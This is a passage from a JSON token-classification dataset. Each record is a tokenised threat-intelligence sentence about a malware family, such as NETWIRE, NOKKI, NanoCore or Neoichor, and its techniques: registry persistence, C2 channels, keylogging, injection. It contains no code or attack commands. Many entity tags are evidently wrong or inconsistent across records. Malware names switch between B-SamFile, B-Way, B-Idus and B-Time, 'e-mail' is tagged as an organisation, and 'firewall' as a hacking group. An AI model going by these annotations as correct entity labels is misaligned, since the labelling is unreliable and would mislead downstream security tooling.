"`HKCU:\\Software\\Netwire`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "copy", "itself", "to", "and", "launch", "itself", "from", "hidden", "folders." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "downloaded", "payloads", "from", "C2", "to", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "NETWIRE", "client", "has", "been", "signed", "by", "fake", "and", "invalid", "digital", "certificates." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "perform", "keylogging." ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "use", "launch", "agents", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "the", "ability", "to", "write", "collected", "data", "to", "a", "file", "created", "in", "the", "<code>./LOGS</code>", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "persist", "via", "startup", "options", "for", "Login", "items." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "been", "executed", "through", "luring", "victims", "into", "opening", "malicious", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "been", "executed", "through", "convincing", "victims", "into", "clicking", "malicious", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "masqueraded", "as", "legitimate", "software", "including", "TeamViewer", "and", "macOS", "Finder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "NETWIRE", "can", "modify", "the", "Registry", "to", "store", "its", "configuration", "information." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "use", "Native", "API", "including", "<code>CreateProcess</code>", "<code>GetProcessById</code>,", "and", "<code>WriteProcessMemory</code>." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "NETWIRE", "can", "use", "TCP", "in", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "used", "a", "custom", "obfuscation", "algorithm", "to", "hide", "strings", "including", "Registry", "keys,", "APIs,", "and", "DLL", "names." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "NETWIRE", "binary", "has", "been", "executed", "via", "PowerShell", "script." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "NETWIRE", "can", "discover", "processes", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "NETWIRE", "payload", "has", "been", "injected", "into", "benign", "Microsoft", "executables", "via", "process", "hollowing." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "NETWIRE", "can", "inject", "code", "into", "system", "processes", "including", "notepad.exe,", "svchost.exe,", "and", "vbc.exe." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "NETWIRE", "can", "implement", "use", "of", "proxies", "to", "pivot", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "creates", "a", "Registry", "start-up", "entry", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "create", "a", "scheduled", "task", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "capture", "the", "victim's", "screen." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "used", ".NET", "packer", "tools", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "been", "spread", "via", "e-mail", "campaigns", "utilizing", "malicious", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "NETWIRE", "has", "been", "spread", "via", "e-mail", "campaigns", "utilizing", "malicious", "links." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "use", "AES", "encryption", "for", "C2", "data", "transferred." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "discover", "and", "collect", "victim", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "NETWIRE", "can", "collect", "the", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "capture", "session", "logon", "details", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "the", "ability", "to", "use", "<code>/bin/bash</code>", "and", "<code>/bin/sh</code>", "to", "execute", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "been", "executed", "through", "use", "of", "VBScripts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "has", "the", "ability", "to", "communicate", "over", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "NETWIRE", "has", "used", "web", "services", "including", "Paste.ee", "to", "host", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "NETWIRE", "can", "issue", "commands", "using", "cmd.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "NETWIRE", "can", "use", "XDG", "Autostart", "Entries", "to", "establish", "persistence", "on", "Linux", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NGLite", "has", "abused", "NKN", "infrastructure", "for", "its", "C2", "communication." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "NGLite", "will", "use", "an", "AES", "encrypted", "channel", "for", "command", "and", "control", "purposes,", "in", "one", "case", "using", "the", "key", "<code>WHATswrongwithUu</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "NGLite", "identifies", "the", "victim", "system", "MAC", "and", "IPv4", "addresses", "and", "uses", "these", "to", "establish", "a", "victim", "identifier." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NGLite", "will", "run", "the", "<code>whoami</code>", "command", "to", "gather", "system", "information", "and", "return", "this", "to", "the", "command", "and", "control", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NGLite", "will", "initially", "beacon", "out", "to", "the", "NKN", "network", "via", "an", "HTTP", "POST", "over", "TCP", "30003." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "uses", "a", "Cron", "job", "to", "establish", "persistence", "when", "infecting", "Linux", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Org", "O" ] }, { "tokens": [ "NKAbuse", "utilizes", "external", "services", "such", "as", "<code>ifconfig.me</code>", "to", "identify", "the", "victim", "machine's", "IP", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "has", "abused", "the", "NKN", "public", "blockchain", "protocol", "for", "its", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "enables", "multiple", "types", "of", "network", "denial", "of", "service", "capabilities", "across", "several", "protocols", "post-installation." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "will", "check", "victim", "systems", "to", "ensure", "only", "one", "copy", "of", "the", "malware", "is", "running." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "can", "take", "screenshots", "of", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "conducts", "multiple", "system", "checks", "and", "includes", "these", "in", "subsequent", "\"heartbeat\"", "messages", "to", "the", "malware's", "command", "and", "control", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NKAbuse", "is", "initially", "installed", "and", "executed", "through", "an", "initial", "shell", "script." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "uses", "the", "Windows", "call", "SetWindowsHookEx", "and", "begins", "injecting", "it", "into", "every", "GUI", "process", "running", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "uses", "a", "unique,", "custom", "de-obfuscation", "technique." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "NOKKI", "can", "delete", "files", "to", "cover", "tracks." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "NOKKI", "has", "used", "FTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "has", "downloaded", "a", "remote", "module", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "can", "collect", "data", "from", "the", "victim", "and", "stage", "it", "in", "<code>LOCALAPPDATA%\\MicroSoft", "Updatea\\uplog.tmp</code>." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "NOKKI", "is", "written", "to", "%LOCALAPPDATA%\\MicroSoft", "Updatea\\svServiceUpdate.exe", "prior", "being", "executed", "in", "a", "new", "process", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "folder", "and", "file." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "uses", "Base64", "encoding", "for", "strings." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "NOKKI", "has", "established", "persistence", "by", "writing", "the", "payload", "to", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "has", "used", "rundll32", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "NOKKI", "can", "gather", "information", "on", "drives", "and", "the", "operating", "system", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "can", "gather", "information", "on", "the", "victim", "IP", "address." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "can", "collect", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "can", "collect", "the", "current", "timestamp", "of", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NOKKI", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Naid", "creates", "Registry", "entries", "that", "store", "information", "about", "a", "created", "service", "and", "point", "to", "a", "malicious", "DLL", "dropped", "to", "disk." ], "ner_tags": [ "B-Way", "I-Features", "B-HackOrg", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Naid", "collects", "a", "unique", "identifier", "(UID)", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naid", "collects", "the", "domain", "name", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Naid", "creates", "a", "new", "service", "to", "establish." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "uses", "DNS", "for", "the", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "can", "change", "Internet", "Explorer", "settings", "to", "reduce", "warnings", "about", "malware", "activity." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "NanHaiShu", "encodes", "files", "in", "Base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "launches", "a", "script", "to", "delete", "their", "original", "decoy", "file", "to", "cover", "tracks." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "can", "download", "additional", "files", "from", "URLs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "NanHaiShu", "executes", "additional", "Jscript", "code", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "uses", "mshta.exe", "to", "load", "its", "program", "and", "files." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "modifies", "the", "%regrun%", "Registry", "to", "point", "itself", "to", "an", "autostart", "mechanism." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "can", "gather", "the", "victim", "computer", "name", "and", "serial", "number." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "can", "gather", "information", "about", "the", "victim", "proxy", "server." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "collects", "the", "username", "from", "the", "victim." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanHaiShu", "executes", "additional", "VBScript", "code", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "can", "capture", "audio", "feeds", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "can", "modify", "the", "victim's", "firewall." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-HackOrg" ] }, { "tokens": [ "NanoCore", "can", "modify", "the", "victim's", "anti-virus." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "has", "the", "capability", "to", "download", "and", "activate", "additional", "modules", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "NanoCore", "can", "perform", "keylogging", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "has", "the", "capability", "to", "edit", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "NanoCore’s", "plugins", "were", "obfuscated", "with", "Eazfuscater.NET", "3.3." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "NanoCore", "creates", "a", "RunOnce", "key", "in", "the", "Registry", "to", "execute", "its", "VBS", "scripts", "each", "time", "the", "user", "logs", "on", "to", "the", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "uses", "DES", "to", "encrypt", "the", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "gathers", "the", "IP", "address", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "NanoCore", "can", "access", "the", "victim's", "webcam", "and", "capture", "data." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "NanoCore", "uses", "VBS", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "B-Features" ] }, { "tokens": [ "NanoCore", "can", "open", "a", "remote", "command-line", "interface", "and", "execute", "commands.", "NanoCore", "uses", "JavaScript", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-SamFile", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "NativeZone", "can", "decrypt", "and", "decode", "embedded", "Cobalt", "Strike", "beacon", "stage", "shellcode." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "NativeZone", "can", "check", "for", "the", "presence", "of", "KM.EkeyAlmaz1C.dll", "and", "will", "halt", "execution", "unless", "it", "is", "in", "the", "same", "directory", "as", "the", "rest", "of", "the", "malware's", "components." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NativeZone", "can", "display", "an", "RTF", "document", "to", "the", "user", "to", "enable", "execution", "of", "Cobalt", "Strike", "stage", "shellcode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NativeZone", "has,", "upon", "execution,", "displayed", "a", "message", "box", "that", "appears", "to", "be", "related", "to", "a", "Ukrainian", "electronic", "document", "management", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NativeZone", "has", "used", "rundll32", "to", "execute", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "NativeZone", "has", "checked", "if", "Vmware", "or", "VirtualBox", "VM", "is", "running", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NavRAT", "can", "download", "files", "remotely." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "NavRAT", "logs", "the", "keystrokes", "on", "the", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "NavRAT", "writes", "multiple", "outputs", "to", "a", "TMP", "file", "using", "the", ">>", "method." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "NavRAT", "uses", "the", "email", "platform,", "Naver,", "for", "C2", "communications,", "leveraging", "SMTP." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "O", "B-Way", "O", "O", "O", "B-Features", "B-HackOrg" ] }, { "tokens": [ "NavRAT", "uses", "<code>tasklist", "/v</code>", "to", "check", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NavRAT", "copies", "itself", "into", "a", "running", "Internet", "Explorer", "process", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NavRAT", "creates", "a", "Registry", "key", "to", "ensure", "a", "file", "gets", "executed", "upon", "reboot", "in", "order", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NavRAT", "uses", "<code>systeminfo</code>", "on", "a", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "NavRAT", "leverages", "cmd.exe", "to", "perform", "discovery", "techniques.", "NavRAT", "loads", "malicious", "shellcode", "and", "executes", "it", "in", "memory." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "use", "DLL", "side-loading", "to", "gain", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "has", "the", "capability", "to", "upload", "collected", "files", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Nebulae", "has", "the", "ability", "to", "delete", "files", "and", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-HackOrg" ] }, { "tokens": [ "Nebulae", "can", "list", "files", "and", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "download", "files", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Nebulae", "has", "created", "a", "service", "named", "\"Windows", "Update", "Agent1\"", "to", "appear", "legitimate." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "uses", "functions", "named", "<code>StartUserModeBrowserInjection</code>", "and", "<code>StopUserModeBrowserInjection</code>", "indicating", "that", "it's", "trying", "to", "imitate", "chrome_frame_helper.dll." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Nebulae", "has", "the", "ability", "to", "use", "<code>CreateProcess</code>", "to", "execute", "a", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "use", "TCP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "enumerate", "processes", "on", "a", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "achieve", "persistence", "through", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "use", "RC4", "and", "XOR", "to", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "discover", "logical", "drive", "information", "including", "the", "drive", "type,", "free", "space,", "and", "volume", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "use", "CMD", "to", "execute", "a", "process." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Nebulae", "can", "create", "a", "service", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "use", "the", "Internet", "Explorer", "(IE)", "COM", "interface", "to", "connect", "and", "receive", "commands", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "upload", "files", "from", "a", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "clear", "the", "browser", "history", "on", "a", "compromised", "host", "by", "changing", "the", "`ClearBrowsingHistoryOnExit`", "value", "to", "1", "in", "the", "`HKEY_CURRENT_USER\\Software\\Microsoft\\Internet", "Explorer\\Privacy`", "Registry", "key." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "download", "additional", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "check", "for", "Internet", "connectivity", "by", "contacting", "bing[.]com", "with", "the", "request", "format", "`bing[.]com?id=<GetTickCount>`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "has", "the", "ability", "to", "configure", "browser", "settings", "by", "modifying", "Registry", "entries", "under", "`HKEY_CURRENT_USER\\Software\\Microsoft\\Internet", "Explorer`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Neoichor", "can", "collect", "the", "OS", "version", "and", "computer", "name", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "identify", "the", "system", "language", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "gather", "the", "IP", "address", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Neoichor", "can", "collect", "the", "user", "name", "from", "a", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ 